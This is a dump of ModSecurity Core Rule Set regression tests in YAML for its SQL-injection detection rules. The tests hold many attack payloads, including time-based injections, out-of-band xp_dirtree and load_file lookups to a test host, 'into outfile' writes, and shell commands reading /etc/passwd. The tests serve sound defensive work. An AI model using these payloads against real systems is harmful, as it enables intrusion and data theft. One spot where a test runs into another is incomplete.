modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml000066400000000000000000000055621446122515100277210ustar00rootroot00000000000000--- meta: author: "Christian S.J. Peron and Allan Boll" description: None enabled: true name: 942130.yaml tests: - test_title: 942130-1 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" version: HTTP/1.0 output: no_log_contains: id "942130" - test_title: 942130-2 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=1=1" version: HTTP/1.1 output: log_contains: id "942130" - test_title: 942130-3 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=11=1" version: HTTP/1.1 output: no_log_contains: id "942130" - test_title: 942130-4 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=1=11" version: HTTP/1.1 output: no_log_contains: id "942130" - test_title: 942130-5 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=11!=1" version: HTTP/1.1 output: log_contains: id "942130" - test_title: 942130-6 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=1!=11" version: HTTP/1.1 output: log_contains: id "942130" - test_title: 942130-7 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=11!=11" version: HTTP/1.1 output: no_log_contains: id "942130" - test_title: 942130-8 desc: "SQL Injection Attack: SQL Tautology" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET uri: "/?a=b,1=1" version: HTTP/1.1 output: log_contains: id "942130" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml000066400000000000000000000153211446122515100277140ustar00rootroot00000000000000--- meta: author: "Christian S.J. Peron, Christoph Hansen" description: None enabled: true name: 942140.yaml tests: - test_title: 942140-1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?sql_table=pg_catalog" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "INFORMATION_SCHEMA" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "database(" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "db_name(" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "DaTaBasE(" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "InFoRmaTioN_ScHemA" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "DB_NAME(" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "tempdb" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "msdb" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-10 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "mysql.db" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-11 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "MSysAccessObjects" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-12 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "Northwind" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-13 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "northwind" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-14 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SCHEMA_NAME" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-15 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "DATABASE(" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-16 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "schema_name" version: HTTP/1.0 output: log_contains: id "942140" - test_title: 942140-17 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "information_schema" version: HTTP/1.0 output: log_contains: id "942140" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml000066400000000000000000000201661446122515100277200ustar00rootroot00000000000000--- meta: author: "Christian Folini" description: Various SQL injection tests enabled: true name: 942150.yaml tests: - test_title: 942150-1 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-2 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=1' and sleep(9) #" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-3 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=1(select*from(select(sleep(5)))d)" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-4 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-5 stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=test')and (select*from(select(sleep(10)))d)--" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-6 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=foo'||(select extractvalue(xmltype('%tocob;" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-7 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=config.ini' and sleep(91) #" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-8 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-9 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=None')and (select*from(select(sleep(10)))a)--" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-10 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-11 desc: "Simple injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=file:/init.ini'.sleep(12).'" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-12 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-13 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-14 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-15 desc: "Simple injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-16 desc: "Simple injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=test{${sleep(12)}}" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-17 desc: "Advanced injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-18 desc: "Advanced injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" version: HTTP/1.0 output: log_contains: id "942150" - test_title: 942150-19 desc: "Simple injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=\\foobar.txt\" or sleep(4) #" version: HTTP/1.0 output: log_contains: id "942150" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml000066400000000000000000000073771446122515100277320ustar00rootroot00000000000000--- meta: author: "Christian S.J. Peron, Christoph Hansen" description: None enabled: true name: 942160.yaml tests: - test_title: 942160-1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?sql_table=sleep%28534543%29" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "sleEP(3)" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "sleep(5000)" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "BENChmARk(2999/**/999,Md5(NoW()" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "BEncHMARk(2999999,Md5(NoW('')" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "BENCHMARK(5000000,MD5(0x48416166)" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "benchmark(3000000,M%445(4)" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" version: HTTP/1.0 output: log_contains: id "942160" - test_title: 942160-9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" version: HTTP/1.0 output: log_contains: id "942160" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml000066400000000000000000000017511446122515100277220ustar00rootroot00000000000000--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942180.yaml tests: - test_title: 942180-1 desc: "basic SQL authentication bypass" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 # something simple like 3' ' 1 uri: "/?var=3%27%20%27%201" version: HTTP/1.0 output: log_contains: id "942180" - test_title: 942180-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" version: HTTP/1.0 data: "javascript:\"/*'/*`/*-->%ptkjp;" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-7 desc: "Embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=` /bin/cat /etc/passwd`" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-8 desc: "Embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-9 desc: "Embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=`echo crs312``echo 34test`" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-10 desc: "Embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=123-456-01@coreruleset.org'|ping -c 1337 127.0.0.1 #" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-11 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=1);declare @q varchar(99);set @q='\\\\j0kwbatxjfgjp0qu3ibonwovamgmkq8h05unittests.corerule' 'set.org\\kph'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-12 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=content.ini);declare @q varchar(99);set @q='\\\\i1kvc9uwkehiqzrt4hcnovpublhunittests.corerule' 'set.org\\lri'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-13 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=EmptyValue', '4', '2', '7');declare @q varchar(99);set @q='\\\\h5nug8yvodlhuyvs8ggmsuttfklkcjunittests.corerule'+'set.org\\vcr'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-14 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=test));declare @q varchar(99);set @q='\\\\zwzc7qpdfvczlgmazy74jckb62cunittests.corrule'+'set.org\\gej'; exec master.dbo.xp_dirtree @q;--" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-15 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-16 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-17 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=test@coreruleset.org\"|type %SYSTEMROOT%\\win.ini" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-18 desc: "Traces of XSS" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=mytest>'>\">" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-19 desc: "Advanced SQL authentication bypass" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=\"123-456-123@coreruleset.org\"' and (select*from(select(sleep(10)))a)--" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-20 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-21 desc: "Advanced embedded shell execution" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=\"-->'-->`-->" version: HTTP/1.0 output: log_contains: id "942260" - test_title: 942260-22 desc: "Traces of XSS" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var='\">" version: HTTP/1.0 output: log_contains: id "942260" �����������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml��������0000664�0000000�0000000�00000001016�14461225151�0027714�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942270.yaml tests: - test_title: 942270-1 desc: "basic sql injection. Common attack string for mysql, oracle and others" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?var=union%20select%20col%20from" version: HTTP/1.0 output: log_contains: id "942270" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml��������0000664�0000000�0000000�00000001017�14461225151�0027716�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942280.yaml tests: - test_title: 942280-1 desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?var=select%20pg_sleep" version: HTTP/1.0 output: log_contains: id "942280" �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml��������0000664�0000000�0000000�00000001633�14461225151�0027723�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: csanders-git description: None enabled: true name: 942290.yaml tests: - test_title: 942290-1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 uri: /mongo/show.php?u_id[$ne]=2 headers: User-Agent: ModSecurity CRS 3 Tests Host: localhost output: log_contains: id "942290" - test_title: 942290-2 desc: "basic MongoDB SQL injection attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?mongoQ=%5b%24lte%5dasdfsd" version: HTTP/1.0 output: log_contains: id "942290" �����������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml��������0000664�0000000�0000000�00000000765�14461225151�0027720�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942300.yaml tests: - test_title: 942300-1 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=) when 234 then&foo=bar" version: HTTP/1.0 output: log_contains: id "942300" �����������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml��������0000664�0000000�0000000�00000000747�14461225151�0027721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942310.yaml tests: - test_title: 942310-1 desc: "chained SQL injection attempts 2/2" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?var=%22%27%20and%20%3d%20bar" version: HTTP/1.0 output: log_contains: id "942310" �������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml��������0000664�0000000�0000000�00000003433�14461225151�0027715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron, Christoph Hansen" description: None enabled: true name: 942320.yaml tests: - test_title: 942320-1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=procedure%20analyse%20%28" version: HTTP/1.0 output: log_contains: id "942320" - test_title: 942320-2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=exec+%28%40%0A" version: HTTP/1.0 output: log_contains: id "942320" - test_title: 942320-3 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=declare+%40b%0A" version: HTTP/1.0 output: log_contains: id "942320" - test_title: 942320-4 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" version: HTTP/1.0 output: log_contains: id "942320" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml��������0000664�0000000�0000000�00000000743�14461225151�0027717�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942330.yaml tests: - test_title: 942330-1 desc: "classic SQL injection probings 1/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=%22%27&var2=whatever" version: HTTP/1.0 output: log_contains: id "942330" �����������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml��������0000664�0000000�0000000�00000001030�14461225151�0027706�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942340.yaml tests: - test_title: 942340-1 desc: "basic SQL authentication bypass attempts 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 # in ( select * from uri: "/?var=in%20%28%20select%20%2a%20from" version: HTTP/1.0 output: log_contains: id "942340" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml��������0000664�0000000�0000000�00000001777�14461225151�0027731�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron, Franziska Bühler" description: None enabled: true name: 942350.yaml tests: - test_title: 942350-1 desc: "MySQL UDF injection and other data/structure manipulation" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 # ; insert INTO table (word) VALUES('dfsd') uri: "/?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" version: HTTP/1.0 output: log_contains: id "942350" - test_title: 942350-2 desc: "Fix for FP reported in GitHub issue 1587" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 # ;insertion_424242 uri: "/?var=%3Binsertion_424242" version: HTTP/1.0 output: no_log_contains: id "942350" �modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml��������0000664�0000000�0000000�00000032544�14461225151�0027726�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler" description: None enabled: true name: 942360.yaml tests: - test_title: 942360-1 desc: "concatenated basic SQL injection and SQLLFI" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 # 23423 as "sdfsdfs" FROM table data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-2 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "select Char(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-3 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT CHAR(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-4 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT GROUP_CONCAT(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-5 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT group_cOnCat(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-6 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") as cc FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-7 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS orders FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-8 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS `carrier_id` from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-9 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 